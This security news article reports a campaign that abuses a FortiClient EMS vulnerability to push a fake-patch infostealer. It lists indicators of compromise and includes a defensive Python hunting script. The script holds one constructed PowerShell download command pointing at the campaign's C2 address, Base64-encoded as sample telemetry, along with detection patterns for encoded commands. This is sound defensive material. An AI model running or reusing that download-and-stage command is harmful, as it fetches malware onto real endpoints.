FortiClient EMS Exploited to Push Fake Patch That Steals Credentials
Attackers weaponize CVE-2026-35616 to deploy EKZ infostealer via FortiClient EMS management features. Fake Fortinet patch harvests browser passwords and cookies.
Attackers have found a devastating way to weaponize compromised FortiClient EMS servers: using Fortinet's own endpoint management features to push credential-stealing malware disguised as a legitimate security patch.
Arctic Wolf Labs identified the campaign this week, documenting how threat actors exploit CVE-2026-35616 to gain administrative access to FortiClient EMS deployments, then abuse the platform's built-in capabilities to distribute malware across every managed endpoint. The approach turns a trusted security tool into a mass infection vector.
Trusted Infrastructure, Weaponized
The attack begins with exploitation of CVE-2026-35616, the pre-authentication API bypass that Fortinet patched in early April. Attackers who compromise an EMS server gain administrative privileges without needing credentials—and with those privileges comes control over every endpoint the server manages.
Rather than deploying obvious malicious payloads, the threat actors modified several configurations to blend in:
- Deferred firmware upgrade reminders to avoid alerting users
- Altered Remote Access Profile settings
- Injected malicious scripts into endpoint policies
"Threat actors used FortiClient's own management pathway to push malicious PowerShell commands to managed endpoints," Arctic Wolf researchers noted, describing how the attacks mimicked legitimate administrative operations.
Once an attacker controls the EMS configuration, every managed endpoint becomes a potential execution target without requiring a separate intrusion path for each device.
EKZ Infostealer: The Payload
The campaign delivers a previously unreported Windows information stealer that Arctic Wolf dubbed "EKZ." The malware arrives on endpoints disguised as FortiEndpoint_Patch.exe—a filename designed to appear as a routine Fortinet security update.
The execution chain leverages trusted components:
- fortitray.exe (a legitimate FortiClient component) launches a .cmd script file
- The script executes Base64-encoded PowerShell commands
- PowerShell downloads and runs the EKZ stealer payload
This approach abuses the trust relationship between FortiClient components. Security tools often whitelist vendor executables, so a script spawned by a trusted FortiClient binary may run without triggering endpoint detection.
EKZ harvests credentials from multiple sources:
- Passwords and cookies from Chromium-based browsers (Chrome, Edge, Brave)
- Passwords and cookies from Gecko-based browsers (Firefox)
- Autofill data including credit card numbers, addresses, and phone numbers
The credential theft capabilities mirror those seen in other recent infostealer campaigns, including the fake OpenAI privacy filter on Hugging Face that racked up 244,000 downloads before detection.
The stealer writes captured data to a log file in the ProgramData directory. Since EKZ lacks native network exfiltration capabilities, the same PowerShell script handles data transmission—sending stolen credentials via HTTP POST requests to attacker infrastructure at 83.138.53[.]110.
Why This Attack Matters
Endpoint management platforms represent high-value targets precisely because they're designed to push configurations and software to large numbers of devices. When attackers compromise that trust relationship, the blast radius expands to every endpoint the platform manages.
The FortiClient EMS attack demonstrates a pattern that's becoming more common: rather than compromising endpoints one by one, sophisticated actors seek out infrastructure that already has legitimate access to multiple systems. A single EMS compromise can potentially infect hundreds or thousands of managed endpoints simultaneously.
This marks the second major exploitation wave targeting FortiClient EMS this year. The earlier SQL injection vulnerability (CVE-2026-21643) saw active exploitation in March, and CISA added CVE-2026-35616 to its KEV catalog in April with an unusually aggressive three-day remediation deadline for federal agencies.
Detection and Response
Organizations running FortiClient EMS should assume compromise if they operated vulnerable versions (7.4.5 or 7.4.6) before applying April's hotfixes.
Immediate actions:
- Hunt for EKZ indicators — Search managed endpoints for FortiEndpoint_Patch.exe in unexpected locations
- Review ProgramData directories — Look for suspicious log files containing credential data
- Analyze network traffic — Check for connections to 83.138.53[.]110
- Audit EMS configurations — Review policy changes and Remote Access Profile modifications since March 31
- Check PowerShell logs — Look for Base64-encoded execution launched via fortitray.exe
Indicators of Compromise:
| Type | Value |
|---|---|
| C2 IP | 83.138.53[.]110 |
| Malicious filename | FortiEndpoint_Patch.exe |
| Execution parent | fortitray.exe |
| Staging location | ProgramData directory |
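The Python script below is an added example for this article, not Arctic Wolf's or Fortinet's code. It runs the hunting checks from the list above over a few constructed telemetry records and covers each stage of the execution chain described earlier: a script host (cmd.exe or PowerShell) spawned by fortitray.exe, a Base64 UTF-16LE -EncodedCommand decoded and checked for the C2 address or payload name, execution of FortiEndpoint_Patch.exe, and connections to 83.138.53[.]110. The flat dict schema (type, host, parent, image, cmdline, dst_ip, dst_port) is an assumed generic format, not any EDR's real export; the indicator values are the article's, and the encoded sample command is constructed for the demonstration.

```python
"""Hunt sample endpoint telemetry for the EKZ execution chain (added example)."""
import base64
import ntpath
import re


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 83.138.53[.]110 into a matchable value."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


# Indicators from the article's IoC table.
C2_IP = refang("83.138.53[.]110")
PAYLOAD_NAME = "fortiendpoint_patch.exe"
TRUSTED_PARENT = "fortitray.exe"
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# powershell.exe accepts -EncodedCommand and its abbreviations; the argument is Base64 of UTF-16LE.
ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _name(path: str) -> str:
    """Case-insensitive basename of a Windows path."""
    return ntpath.basename(path).lower()


def find_ekz_indicators(events):
    """Return (host, tag, detail) tuples for each stage of the chain seen in the telemetry."""
    findings = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process":
            parent, image = _name(ev.get("parent", "")), _name(ev["image"])
            cmdline = ev.get("cmdline", "")
            if parent == TRUSTED_PARENT and image in SCRIPT_HOSTS:
                findings.append((host, "script_launched_by_fortitray", cmdline))
            decoded = decode_encoded_command(cmdline)
            if decoded is not None:
                tag = "encoded_powershell"
                if C2_IP in decoded or PAYLOAD_NAME in decoded.lower():
                    tag += "_ekz_ioc"
                findings.append((host, tag, decoded))
            if image == PAYLOAD_NAME:
                findings.append((host, "ekz_payload_executed", ev["image"]))
        elif ev["type"] == "network" and ev["dst_ip"] == C2_IP:
            detail = f"{_name(ev['image'])} -> {ev['dst_ip']}:{ev['dst_port']}"
            findings.append((host, "c2_connection", detail))
    return findings


def hosts_to_triage(findings):
    """Group finding tags by host so responders see which endpoints need isolation."""
    by_host = {}
    for host, tag, _ in findings:
        by_host.setdefault(host, set()).add(tag)
    return by_host


# Constructed sample: the kind of download command the article says the script issues.
SAMPLE_SCRIPT = ("Invoke-WebRequest -Uri http://83.138.53.110/update "
                 "-OutFile C:\\ProgramData\\FortiEndpoint_Patch.exe")
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TRAY_PATH = r"C:\Program Files\Fortinet\FortiClient\fortitray.exe"

# Constructed telemetry: ws01 shows the full chain, ws02 shows only benign activity.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "parent": TRAY_PATH,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c C:\ProgramData\patch.cmd"},
    {"type": "process", "host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": PS_PATH, "cmdline": "powershell.exe -NoProfile -EncodedCommand " + SAMPLE_ENCODED},
    {"type": "process", "host": "ws01", "parent": PS_PATH,
     "image": r"C:\ProgramData\FortiEndpoint_Patch.exe", "cmdline": r"C:\ProgramData\FortiEndpoint_Patch.exe"},
    {"type": "network", "host": "ws01", "image": PS_PATH, "dst_ip": "83.138.53.110", "dst_port": 80},
    {"type": "process", "host": "ws02", "parent": TRAY_PATH,
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe", "cmdline": "FortiClient.exe"},
    {"type": "network", "host": "ws02", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "203.0.113.7", "dst_port": 443},
]

if __name__ == "__main__":
    for host, tags in hosts_to_triage(find_ekz_indicators(SAMPLE_EVENTS)).items():
        print(host, sorted(tags))
```

The decoder is the piece worth reusing: Windows 4688 and Sysmon process-creation records carry the command line, but the Base64 argument only becomes searchable for the C2 address or filename once it is decoded as UTF-16LE. The parent/child rule intentionally fires only for script hosts under fortitray.exe, so the FortiClient GUI being launched by the tray process on ws02 is not reported.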
For organizations still running vulnerable EMS versions, FortiClient EMS 7.4.7 contains the permanent fix. Hotfixes remain available for 7.4.5 and 7.4.6 deployments. Given confirmed malware distribution through this vector, patching alone isn't sufficient—incident response investigation is warranted.
Broader Implications
The EKZ campaign highlights why endpoint management security matters. These platforms exist in a position of extraordinary trust—they're authorized to modify configurations, deploy software, and execute commands across managed device fleets. That same trust makes them devastating when compromised.
Understanding how infostealers work helps organizations recognize the signs of credential theft before attackers monetize stolen data. The EKZ stealer follows patterns common to modern infostealers: targeting browser credential stores, harvesting autofill data, and exfiltrating through simple HTTP mechanisms.
Fortinet acknowledged active exploitation when releasing the CVE-2026-35616 patches. The progression from vulnerability disclosure to weaponized malware campaign took roughly seven weeks—a timeline that underscores why organizations treating patch delays as acceptable risk need to recalibrate. Attackers aren't waiting for convenient maintenance windows.
The EKZ campaign joins a busy week for credential theft operations—security researchers also uncovered malicious npm packages impersonating Claude AI designed to steal GitHub tokens.